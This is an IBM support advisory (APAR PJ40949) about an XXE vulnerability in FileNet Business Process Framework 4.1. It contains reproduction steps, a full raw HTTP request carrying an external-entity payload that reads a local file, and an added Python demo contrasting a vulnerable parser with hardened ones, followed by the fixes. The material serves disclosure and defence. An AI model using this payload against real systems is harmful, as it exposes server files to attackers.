IBM Support

PJ40949: BPF IS SUSCEPTIBLE TO XXE (XML EXTERNAL ENTITY) ATTACKS


APAR status

  • Closed as program error.

Error description

  • How long has the problem been occurring (describe any recent
    changes)?
    Always
    
    Is there a workaround? (Yes - describe, or No)
    No
    
    What is the impact to the customer/system?
    End customer system has failed their PCI compliance audit which
    is required for their business
    
    Steps to Reproduce:
    Steps tested in-house and taken from customer's attached PDF
    file:
    1. Install and start fiddler2 (http://www.fiddler2.com)
    2. Logon to BPF
    3. Using fiddler post the following 'attack' request as per page
    1 of the customer's PDF:
        <!DOCTYPE foobar [<!ENTITY xxe SYSTEM 'testfile'>]><Request><Action>&xxe;<Param></Param></Action></Request>
    4. In fiddler note that the reply received is as per the
    customer's description
    5. Other steps from the customer's document can be followed and
    the results are as described
    
    Attachments:
    Customer PDF describing XXE attack found:
    https://ecurep.mainz.de.ibm.com:444/rest/download/20462,140,702/
    mail20121212-112043-Petri.Pietilainen/BPF_security_issues.pdf
    
    Additional Information:
    The full attack request used in-house with fiddler2 for step 3
    (and the subsequent steps) is:
    
    POST http://cn-site:9080/bpf/dispatchAction HTTP/1.1
    Accept: */*
    Accept-Language: en-ie
    Referer: http://cn-site:9080/bpf/Bp8Main.jsp
    Content-Type: text/xml;charset=UTF-8
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
    Host: cn-site:9080
    Content-Length: 107
    Connection: Keep-Alive
    Pragma: no-cache
    Cookie: bp8-user-name=65|100|109|105|110|105|115|116|114|97|116|111|114; JSESSIONID=000022Z9mYzpJsufNvmicQMML1X:-1; bpf_childadmin/MainWindow=30%2C1924%2C780%2C1135; Administrator/MainWindow=52%2C1909%2C1596%2C1128
    
    <!DOCTYPE foobar [<!ENTITY xxe SYSTEM 'testfile'>]><Request><Action>&xxe;<Param></Param></Action></Request>
    
    Configuration/Environment:
    In-house
    Windows 2003
    BPF 4.1.0.7
    
    Windows 7 Client
    MS IE 8.0 32bit
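
The request above declares an external general entity pointing at a local
file and references it inside <Action>; an XML parser that resolves such
entities splices the file's contents into the document at that point, which
is the whole attack. The following Python program is an added example for
this APAR, not code from BPF or from IBM, and uses the standard library's
xml.sax to show the same payload shape against a weak parser (external
entities resolved), a hardened one (external entities disabled) and one that
refuses any DOCTYPE. The file path, its contents ("CONSTRUCTED-SECRET ..."),
and the helper names are constructed for the example; the page does not say
what BPF actually returned in its reply or which change BPF-4.1.0-010 made.

```python
"""XXE in miniature: a parser that resolves external general entities
splices a local file into the document wherever &xxe; appears.
Added example for this APAR; not BPF or IBM code."""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler

# Constructed stand-in for the 'testfile' named in the APAR's payload.
SECRET = "CONSTRUCTED-SECRET: db.password=hunter2"


def write_testfile(directory):
    """Create the file the entity will point at; returns its absolute path."""
    path = os.path.join(directory, "testfile")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SECRET)
    return path


def build_payload(entity_target):
    """Same shape as the APAR request body; only the SYSTEM literal differs
    (an absolute path, so the example does not depend on the working dir)."""
    return (
        "<!DOCTYPE foobar [<!ENTITY xxe SYSTEM '%s'>]>"
        "<Request><Action>&xxe;<Param></Param></Action></Request>" % entity_target
    ).encode("utf-8")


class ActionCollector(handler.ContentHandler):
    """Gathers the text of <Action>, the element the entity reference sits in."""

    def __init__(self):
        super().__init__()
        self.in_action = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "Action":
            self.in_action = True

    def endElement(self, name):
        if name == "Action":
            self.in_action = False

    def characters(self, content):
        if self.in_action:
            self.parts.append(content)


class DoctypeRejected(ValueError):
    """Raised when a DOCTYPE is seen and the caller asked for none."""


class DoctypeRejector:
    """Lexical handler that aborts at the first DOCTYPE. Entities can only be
    declared in a DTD, so this blocks external and internal entity tricks."""

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected("DOCTYPE %r not permitted" % name)

    def endDTD(self):
        pass


def parse_action(payload, resolve_external_entities, reject_doctype=False):
    """Parse the request body and return the text of <Action>.

    resolve_external_entities=True is the weak configuration under which the
    APAR's payload works; False (the stdlib default since 3.7.1) silently
    skips the entity; reject_doctype=True refuses the document before any
    entity can be declared.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    parser.setFeature(handler.feature_external_pes, False)
    if reject_doctype:
        parser.setProperty(handler.property_lexical_handler, DoctypeRejector())
    collector = ActionCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.parts)


def demo():
    """Run the three configurations against one payload and return
    (text echoed by the weak parser, text from the hardened parser,
    whether the DOCTYPE-rejecting parser refused the document)."""
    with tempfile.TemporaryDirectory() as tmp:
        payload = build_payload(write_testfile(tmp))
        leaked = parse_action(payload, resolve_external_entities=True)
        skipped = parse_action(payload, resolve_external_entities=False)
        try:
            parse_action(payload, resolve_external_entities=False,
                         reject_doctype=True)
            rejected = False
        except DoctypeRejected:
            rejected = True
    return leaked, skipped, rejected


if __name__ == "__main__":
    leaked, skipped, rejected = demo()
    print("weak parser echoed :", repr(leaked))
    print("hardened parser    :", repr(skipped))
    print("DOCTYPE rejected   :", rejected)
```

The weak configuration returns the file's contents as the text of <Action>,
which a server that echoes request fields back (as the APAR's step 4 implies
BPF did) hands straight to the client. Disabling external general entities is
the minimum fix; rejecting DOCTYPE outright is the stronger one because it
also removes internal-entity expansion ("billion laughs") and parameter-entity
variants. BPF is a Java web application (the .jsp page and JSESSIONID cookie
in the request show that), where the equivalent JAXP settings are
`setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`
on the DocumentBuilderFactory or SAXParserFactory, or at least
`setFeature("http://xml.org/sax/features/external-general-entities", false)`;
the page does not state which of these the FixPack applied.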
    

Local fix

Problem summary

  • ****************************************************************
    * USERS AFFECTED:                                              *
    * BPF web application users                                    *
    ****************************************************************
    * PROBLEM DESCRIPTION:                                         *
    * BPF is susceptible to XXE (XML eXternal Entity) attacks.     *
    ****************************************************************
    * RECOMMENDATION:                                              *
    * Apply the BPF-4.1.0-010 GA FixPack.                          *
    ****************************************************************
    

Problem conclusion

  • The issue is fixed in BPF-4.1.0-010.
    

Temporary fix

Comments

APAR Information

  • APAR number

    PJ40949

  • Reported component name

    BUS PROC FRAMEW

  • Reported component ID

    5724R7500

  • Reported release

    410

  • Status

    CLOSED PER

  • PE

    NoPE

  • HIPER

    NoHIPER

  • Special Attention

    NoSpecatt

  • Submitted date

    2013-01-28

  • Closed date

    2014-01-23

  • Last modified date

    2014-01-23

  • APAR is sysrouted FROM one or more of the following:

  • APAR is sysrouted TO one or more of the following:

Fix information

  • Fixed component name

    BUS PROC FRAMEW

  • Fixed component ID

    5724R7500

Applicable component levels

  • R410 PSY

       UP



Document information

More support for: FileNet Business Process Framework

Software version: 4.1

Reference #: PJ40949

Modified date: 23 January 2014